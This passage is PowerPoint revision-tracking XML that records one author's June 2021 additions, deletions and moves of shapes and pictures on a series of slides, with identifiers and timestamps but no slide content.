          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.629" v="1671" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="848404907" sldId="433"/>
            <ac:picMk id="4" creationId="{83AF133D-0644-4071-A348-E159CB2817DF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:12:15.231" v="1756"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2829655940" sldId="434"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:04:14.555" v="1675" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2829655940" sldId="434"/>
            <ac:spMk id="2" creationId="{D9A064EC-8A6B-4F44-AFC6-D30DC11DF77C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:09:51.369" v="1742" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2829655940" sldId="434"/>
            <ac:spMk id="3" creationId="{3FB0E406-7148-4062-8E59-8477B01959F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:04:14.555" v="1675" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2829655940" sldId="434"/>
            <ac:spMk id="4" creationId="{E9C659C2-1B51-4AD4-9F42-DC43349408AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:40:40.036" v="1917" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3752964083" sldId="435"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:08:18.809" v="1720" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3752964083" sldId="435"/>
            <ac:spMk id="2" creationId="{7C81EF5F-680C-4140-8F18-982548805243}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:08:18.809" v="1720" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3752964083" sldId="435"/>
            <ac:spMk id="3" creationId="{A3391F8A-3B5C-45B6-9DC2-223AAD9FCC2D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:40:40.036" v="1917" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3752964083" sldId="435"/>
            <ac:spMk id="4" creationId="{2FDEBD91-F44A-416A-8E80-0B29ACD3F288}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:14:50.386" v="1792" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3752964083" sldId="435"/>
            <ac:picMk id="6" creationId="{C75E34B0-FA8C-46E9-9545-EB160B99E0D8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:41:00.419" v="1944" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3503932430" sldId="436"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:41:00.419" v="1944" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3503932430" sldId="436"/>
            <ac:spMk id="2" creationId="{054FAA32-D6C5-4EEE-B344-29E3940A5159}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:18:38.874" v="1796" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3503932430" sldId="436"/>
            <ac:picMk id="4" creationId="{6997FD19-DC06-4FCA-B88A-A3AE27C71B9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:41:16.603" v="1962" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984469485" sldId="437"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:41:16.603" v="1962" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="2" creationId="{4E15ACA9-8705-421C-BF40-8CE5BC6F0C9E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:34:55.727" v="1853" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="4" creationId="{E5CD3E0A-24C9-4661-AB93-05EE626F5CD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:37:48.464" v="1870"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="9" creationId="{94F87AB4-37E5-485C-9B88-9885C608EBDE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:18.240" v="1901" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="10" creationId="{DFF63605-0712-4C86-A936-89CE999AB4C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:34:58.524" v="1854" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:picMk id="6" creationId="{760F1196-A840-4624-B2B2-E9EFA8D52BCC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:37:48.069" v="1868" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:picMk id="8" creationId="{EC0AC333-404F-45A9-A1D9-FF0B46834F68}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:24.875" v="1903" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:cxnSpMk id="12" creationId="{863E9DBD-30D0-4A5F-8CB1-03E819F279E3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:33.205" v="1905" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:cxnSpMk id="14" creationId="{F2B8D4FC-7423-47FC-85FD-6793590CC410}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:42:20.128" v="1966" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4198334412" sldId="438"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:40:24.925" v="1907"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4198334412" sldId="438"/>
            <ac:spMk id="2" creationId="{0F57E0AC-3CAE-486A-97DE-98D5635B71F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:42:20.128" v="1966" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4198334412" sldId="438"/>
            <ac:picMk id="4" creationId="{81B87CC8-C95A-4AE6-BB0F-470F40A10D53}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:45:55.971" v="1971" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192281943" sldId="439"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:43:39.922" v="1968"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192281943" sldId="439"/>
            <ac:spMk id="2" creationId="{FD81338F-CC6C-4B88-AEEA-CCC70DDFAF40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:45:55.971" v="1971" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192281943" sldId="439"/>
            <ac:picMk id="4" creationId="{445027BD-094C-49DA-98C0-3A6BFB601AB1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:33.949" v="2031" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3098642995" sldId="440"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:11.354" v="2029" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3098642995" sldId="440"/>
            <ac:spMk id="2" creationId="{4B9E07AD-0E48-42E3-9591-B5AE043AF808}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:33.949" v="2031" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3098642995" sldId="440"/>
            <ac:picMk id="4" creationId="{9BB225AD-15B5-49EB-B29B-02AE10DCCDE1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:55:21.260" v="2063" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3265397422" sldId="441"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:54:51.260" v="2058" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265397422" sldId="441"/>
            <ac:spMk id="2" creationId="{9DA01E7A-853C-4CE3-8014-CAB69AA8C9FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:55:21.260" v="2063" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265397422" sldId="441"/>
            <ac:picMk id="4" creationId="{808FB4A1-936E-4CF1-9771-992D07621234}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:10.779" v="2095" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4060643725" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:06.547" v="2093" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="2" creationId="{20FBEB77-566B-4168-AE3D-9FC3F636FF57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:10.779" v="2095" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="3" creationId="{F895820A-133A-4CBD-BD17-4AFBF584A4F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:06.547" v="2093" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="4" creationId="{B94316E1-ED0F-467D-A861-5A01B548D9B3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:48.913" v="2177" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3308258886" sldId="443"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:28:26.907" v="2097" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="2" creationId="{CF7DD7EC-B96E-472D-B626-FDADB606847A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:28:26.907" v="2097" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="3" creationId="{3AD4E54B-820F-4B9E-A899-D7E93E790FA2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:48.913" v="2177" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="4" creationId="{65CC9643-7F3F-463E-BF81-2F26A95275A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T13:56:49.188" v="2136" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="5" creationId="{B24A83FB-DEBB-4361-B724-7FA73E0761CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:08.878" v="2166" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="7" creationId="{E8077A86-6177-46F8-BC1A-EDC9365A5232}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:06:48.090" v="2160" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="9" creationId="{35F65AE4-C97A-4F88-B746-96D76D9ADFD4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:08.074" v="2165" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="11" creationId="{0654CF8C-0926-4977-8FF1-FB95795DA4F1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:09:05.312" v="2218" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2290480652" sldId="444"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:08:11.656" v="2213" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2290480652" sldId="444"/>
            <ac:spMk id="2" creationId="{AA7928D3-98DF-4D45-93B0-F0E2F43E5412}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:09:05.312" v="2218" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2290480652" sldId="444"/>
            <ac:picMk id="4" creationId="{93C75D7E-9E4C-47EB-9B1A-F446917E7AD6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:29:01.031" v="2277" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1737777844" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:21:07.410" v="2260" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:spMk id="2" creationId="{761FC423-5121-4249-BCEF-8E4C81F7B249}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:29:01.031" v="2277" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:picMk id="4" creationId="{B439B6F3-D834-447A-815F-2F2CD9529B1F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:28:58.759" v="2276" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:picMk id="6" creationId="{A20873FE-3DD1-4167-AE3F-1AFB4EC7F850}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625291343" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="2" creationId="{8BF062BD-790B-4A8A-A964-AFADDB9ABAE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:12.519" v="2342" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="7" creationId="{53976C66-44D4-428F-B5B4-989D503B6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:33.196" v="2368" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="8" creationId="{9C3F71E9-3EB9-421E-9264-F5CB6D03832C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:45.996" v="2301" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="4" creationId="{6755E551-E525-4778-A07B-F29E5BC5CB06}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:36.777" v="2298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="6" creationId="{86091216-7469-46ED-95F0-405F871469F2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:41.915" v="2642" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
